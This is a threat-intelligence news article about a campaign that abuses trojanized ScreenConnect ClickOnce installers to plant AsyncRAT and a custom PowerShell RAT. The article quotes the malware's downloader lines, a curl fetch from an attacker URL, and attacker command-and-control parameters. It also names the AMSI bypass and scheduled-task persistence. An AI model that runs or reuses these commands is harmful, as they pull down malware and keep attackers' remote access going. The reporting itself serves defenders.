Cybersecurity

A recent cyber campaign has been identified, targeting U.S.-based organizations via trojanized ConnectWise ScreenConnect installers. This development marks a significant advancement in the misuse of remote monitoring and management (RMM) tools.

Since March 2025, these attacks have increased in frequency and technical complexity, utilizing legitimate administrative software to establish persistent footholds within corporate networks.

The campaign uses deceptive social engineering tactics, distributing malicious installers disguised as legitimate documents, such as “agreement_support-pdf.Client.exe” and “Social_Security_Statement_Documents_386267.exe.”

These files appear as genuine support materials or financial documents, exploiting user trust to gain initial system access.

Upon execution, the installers establish connections to attacker-controlled servers, effectively converting victims’ machines into remotely accessible assets.

This campaign is distinct from previous ScreenConnect abuses due to the deployment of ClickOnce runner installers instead of traditional full installers.

Researchers at Acronis identified that these evolved installers lack embedded configuration data, fetching components and settings at runtime from compromised infrastructure.

This architectural change significantly complicates detection efforts, as traditional static analysis methods that rely on identifying suspicious embedded configurations become ineffective.

The threat actors exhibit notable operational complexity by concurrently deploying multiple remote access trojans (RATs) on compromised systems.

Within minutes of ScreenConnect installation, automated processes deploy both the well-documented AsyncRAT and a custom PowerShell-based RAT developed specifically for these campaigns.

This dual-deployment strategy indicates either redundancy planning or shared infrastructure among multiple threat groups.

Advanced Infection Chain Analysis

The technical sophistication of this campaign is evident through the examination of its multi-stage infection process.

The initial ClickOnce installer connects to attacker infrastructure using parameters such as “e = Support & y = Guest & h = morco.rovider.net & p = 8041,” establishing communication with command-and-control servers hosted on compromised virtual private servers.

Following successful installation, the malware leverages ScreenConnect’s built-in automation capabilities to execute a batch file designated as “BypaasaUpdate.bat.”

This initial payload functions as a sophisticated downloader, retrieving a compressed archive containing multiple encoded components:

set LINK = https://guilloton.fr/x.zip
set ZIP_PATH = %ProgramData%\ali.zip
curl -s -o "%ZIP_PATH%" %LINK%

The downloaded archive contains strategically named files including “1.txt” (containing AsyncRAT), “pe.txt” (AMSI bypass mechanisms), and “Skype.ps1” (PowerShell execution script).

This naming convention represents deliberate obfuscation designed to evade signature-based detection systems.

The persistence mechanism demonstrates particular ingenuity, establishing scheduled tasks that execute every minute while implementing mutex checking to prevent duplicate instances.

The PowerShell script “Skype.ps1” loads encoded .NET assemblies directly into memory, bypassing traditional file-based detection methods while maintaining continuous system access for threat actors.

This campaign signifies a concerning evolution in RMM tool weaponization, combining legitimate software abuse with sophisticated evasion techniques to establish persistent organizational access.